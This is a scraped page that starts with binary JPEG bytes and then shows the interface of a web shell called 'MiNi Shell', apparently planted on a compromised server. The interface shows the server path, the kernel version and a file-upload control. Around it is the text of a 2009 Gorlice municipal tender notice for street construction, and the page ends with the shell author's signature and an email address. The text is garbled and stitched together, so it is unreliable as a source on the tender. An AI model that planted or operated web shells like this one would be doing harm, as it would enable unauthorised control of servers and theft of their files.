JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090123/8216-N-2009.html

<p class="kh_header"><b>Gorlice: BUDOWA I MODERNIZACJA CIĄGU ULIC MIEJSKICH ŁĄCZĄCYCH DROGĘ KRAJOWĄ NR 28 Z DROGAMI WOJEWÓDZKIMI NR 993 i 977 W GORLICACH</b><br>
<b>Numer ogłoszenia: 8216 - 2009; data zamieszczenia: 23.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Gorlice, Urząd Miejski , ul. Rynek 2, 38-300 Gorlice, woj. małopolskie, tel. 018 3551252, faks 018 3551212.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.gorlice.pl/miasto</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA I MODERNIZACJA CIĄGU ULIC MIEJSKICH ŁĄCZĄCYCH DROGĘ KRAJOWĄ NR 28 Z DROGAMI WOJEWÓDZKIMI NR 993 i 977 W GORLICACH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1. Przedmiotem zamówienia są roboty budowlane polegające na budowie i modernizacji ciągu ulic miejskich łączących drogę krajową Nr 28 z drogami wojewódzkimi Nr 993 i 977 w Gorlicach.
1.2. Zamówienie składa się z następujących elementów:
I.  Budowa ulicy Żeromskiego
Odcinek jezdni o długości 56,0 m z obustronnym krawężnikiem. Szerokość jezdni 6,0 m o nawierzchni bitumicznej (beton asfaltowy), budowa odwodnienia (instalacja 2 studzienek),wraz z wykonaniem oznakowania pionowego i poziomego. 
Szczegółowy zakres wykonania elementu określa:
a) dokumentacja projektowa - zał. nr 6 do SIWZ
b) specyfikacja techniczna wykonania i odbioru robót budowlanych - zał. nr 7 do  SIWZ
c) przedmiar robót - zał. nr 8 do SIWZ
II.  Budowa ulicy Żeromskiego         
Odcinek od skrzyżowania z drogą krajową Nr 28 (ul. Kościuszki) do skrzyżowania z ulicą Krzewickiego o długości 181,0 m . Element ten obejmuje wykonanie  jezdni szerokości 5,0 m z obustronnym krawężnikiem o nawierzchni bitumicznej, jednostronny chodnik szerokości 2,0 m z kostki brukowej betonowej, budowa zjazdów na posesje o zmiennej szerokości z kostki brukowej betonowej - 5 szt, budowa muru oporowego o dł. 24,27 m. Wykonanie odwodnienia 
(przyłącz kanalizacji opadowej fi 200 - 32,5 mb), przebudowy sieci energetycznej 
i teletechnicznej. Wykonanie oświetlenia ulicznego na całej długości drogi - 6 szt. słupów oświetleniowych. Wykonanie oznakowania pionowego i poziomego.
Szczegółowy zakres wykonania elementu określa:
a) dokumentacja projektowa - zał. nr 9 do SIWZ
b) specyfikacja techniczna wykonania i odbioru robót budowlanych - zał. nr 10 do SIWZ
c) przedmiar robót - zał. nr 11 do SIWZ 
III.  Remont ulicy Pod Lodownią               
Na długości 180,0 m i szerokości 7 m wykonanie kompleksowego remontu nawierzchni jezdni (polegającego na sfrezowaniu i wyprofilowaniu istniejącej nawierzchni wraz z regulacją studni oraz wykonaniu nakładki asfaltowej grubości 6 cm); wymiana na długości 180 mb nawierzchni i obustronnych  chodników o szerokości 1,5 m na kostkę brukową betonową o łącznej powierzchni 540 m2; budowa zjazdów na posesje o zmiennej szerokości z kostki brukowej betonowej - 3 szt. Jezdnia o nawierzchni bitumicznej, chodnik z kostki brukowej betonowej. Wykonanie oznakowania pionowego i poziomego.
Szczegółowy zakres wykonania elementu określa:
a) uproszczona dokumentacja projektowa - zał. nr 12 do SIWZ
b) specyfikacja techniczna wykonania i odbioru robót budowlanych - zał. nr 13 do SIWZ
c) przedmiar robót - zał. nr 14 do SIWZ 
IV.  Budowa łącznika ulicy Pod Lodownia z ulicą Węgierską
Długość łącznika - 193,0 m. Jezdnia szerokości 7,0 m o nawierzchni bitumicznej (z betonu asfaltowego), dwustronny chodnik szerokości 2,0 m z kostki brukowej betonowej, budowa 3 zjazdów do posesji o różnej szerokości. W zakres elementu wchodzi również wykonanie oświetlenia (4 słupy oświetleniowe), odwodnienia (budowa kanalizacji deszczowej z włączeniem do kanalizacji w ulicy Węgierskiej o łącznej długości 248 m, fi 400 - 153 m, fi 200 - 95 m)  oraz przebudowa gazociągu, wodociągu, sieci energetycznej i telekomunikacyjnej a także wykonanie oznakowania pionowego i poziomego.
Szczegółowy zakres wykonania elementu określa:
a) dokumentacja projektowa - zał. nr 15 do SIWZ
b) specyfikacja techniczna wykonania i odbioru robót budowlanych - zał. nr 16 do SIWZ
c) przedmiar robót - zał. nr 17 do SIWZ
V.   Remont ulicy Armii Krajowej
Na całej długości ulicy 290,0 m i szerokości 6 m wykonanie kompleksowego remontu nawierzchni jezdni polegającej na sfrezowaniu i wyprofilowaniu wraz z regulacją studni i wykonaniu asfaltowej nakładki o grubości 6 cm i chodników (polegająca na uzupełnieniu i wyprofilowaniu podbudowy oraz wykonaniu nowej nawierzchni z kostki brukowej betonowej wraz z przełożeniem krawężnika). Szerokość obustronnych chodników wynosi 3 m a ich długość po jednej stronie 290 mb po drugiej 150 mb. Wykonanie zjazdów na posesje o zmiennej szerokości z kostki brukowej betonowej w liczbie 5 szt.
Wykonanie oznakowania pionowego i poziomego.
Szczegółowy zakres wykonania elementu określa:
a) uproszczona dokumentacja projektowa - zał. nr 18 do SIWZ
b) specyfikacja techniczna wykonania i odbioru robót budowlanych - zał. nr 19 do SIWZ
c) przedmiar robót - zał. nr 20 do SIWZ
VI.  Remont ulicy Szpitalnej 
Remont odcinka ulicy o długości 110,0 m i szerokości 7,0 m polegający na sfrezowaniu i wyprofilowaniu nawierzchni jezdni wraz z regulacją studni, wykonaniu nakładki z asfaltobetonu o grubości 6 cm, wymianie nawierzchni chodników na długości remontowanej ulicy (110 mb) polegająca na uzupełnieniu i wyprofilowaniu podbudowy oraz wykonaniu nowej nawierzchni z kostki brukowej betonowej wraz z przełożeniem krawężnika. Szerokość obustronnych chodników wynosi 2,5 m. Budowa 9 szt. zjazdów na posesje o zmiennej szerokości z kostki brukowej betonowej. Wykonanie oznakowania pionowego i poziomego.
Szczegółowy zakres wykonania elementu określa:
a) uproszczona dokumentacja projektowa - zał. nr 21 do SIWZ
b) specyfikacja techniczna wykonania i odbioru robót budowlanych - zał. nr 22 do SIWZ
c) przedmiar robót - zał. nr 23 do SIWZ
1.3. W formularzu Druk OFERTA w ust 2, Wykonawca zobowiązany jest podać wykaz czynników cenotwórczych w oparciu o które wykonawca wykona ewentualne roboty dodatkowe (zamówienia dodatkowe)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości 15.000,00 zł  (słownie zł: piętnaście tysięcy 00/100).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zmówienia mogą ubiegać się wykonawcy, którzy spełniają niżej wymienione warunki:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj. 
a)  są uprawnieni do prowadzenia działalności gospodarczej określonej przedmiotem zamówienia, 
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tj.
a)  wykonali co najmniej 2 w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia roboty budowlane, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia (za robotę odpowiadającą swoim rodzajem robotom stanowiącym przedmiot zamówienia zamawiający uważa budowę ulicy lub drogi o nawierzchni asfaltowej i o wartości brutto co najmniej 1.500.000,00 PLN każda).  
b)  dysponują osobą która posiada uprawnienia do kierowania robotami budowlanymi w specjalności:
1/ drogowej;
2/ instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych;
3/ instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;
4/ instalacyjnej w zakresie sieci, instalacji i urządzeń gazowych;
5/ telekomunikacyjnej;
należącą do Okręgowej Izby Inżynierów Budownictwa, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osoby posiadającej wymagane uprawnienia;
dysponują osobą która posiada uprawnienia do projektowania w specjalności:
1/ drogowej;
należącą do Okręgowej Izby Inżynierów Budownictwa, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osoby posiadającej wymagane uprawnienia;
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
a) posiadają środki finansowe lub zdolność kredytową o wysokości co najmniej 800.000,00 PLN,


4) nie podlegają wykluczeniu z postępowania o udzielenia zamówienia, (art. 24 ust.1 i 2 ustawy Prawo  zamówień publicznych z dnia 29 stycznia 2004 r. tj. Dz.U. z 2007 r. Nr 223, poz. 1655 z późn. zm.). 

Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana      wg formuły : spełnia - nie spełnia
Nie spełnienie choćby jednego z warunków  skutkować będzie wykluczeniem wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 i art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych z wykorzystaniem wzoru oświadczenia stanowiącego zał. Nr 2 do SIWZ,
W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania działalności objętej przedmiotem zamówienia, oraz nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych należy do oferty dołączyć:
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
W celu potwierdzenia warunku, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, należy do oferty dołączyć:
3. Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, odpowiadającej swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia,  z podaniem ich wartości oraz daty i miejsca wykonania. (w celu potwierdzenia warunku należy wykazać 2 roboty budowlane polegające na budowie ulicy lub drogi o nawierzchni asfaltowej i o wartości brutto co najmniej 1.500.000,00 PLN każda).  
Wykaz należy sporządzić w oparciu o formularz stanowiący  załącznik Nr 4 do SIWZ.
4. Dokumenty potwierdzające, że realizowane roboty podane w wykazie zostały wykonane należycie, 
5. Wykaz osób i podmiotów, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji  zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności. Wykaz należy sporządzić w oparciu o formularz stanowiący załącznik Nr 5 do SIWZ.  
6. Uprawnienia do wykonywania samodzielnych funkcji kierownika budowy w specjalności: 
a/ drogowej;
b/ instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych;
c/ instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;
d/ instalacyjnej w zakresie sieci, instalacji i urządzeń gazowych;
e/ telekomunikacyjnej;
7. Uprawnienia do projektowania w specjalności: 
a/ drogowej;
8. Zaświadczenie o wpisie osób posiadających wymagane uprawnienia o których mowa w pkt 6, 7 do Okręgowej Izby Inżynierów Budownictwa z wyszczególnieniem nazwy Izby i numeru członkowskiego,
9. Jeżeli wykonawca będzie dysponował  osobami zdolnymi do wykonania zamówienia pisemne zobowiązanie innych podmiotów do udostępnienia osób,
W celu potwierdzenia warunku, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy do oferty dołączyć:
10. Informację banku, w którym wykonawca posiada rachunek potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert  (co najmniej 800.000,00 PLN).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gorlice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Miejska Gorlice - Urząd Miejski, Rynek 2, 38- 300 Gorlice, pok. 114.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2009 godzina 12:00, miejsce: Gmina Miejska Gorlice - Urząd Miejski, Rynek 2, 38- 300 Gorlice, pok. 114.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com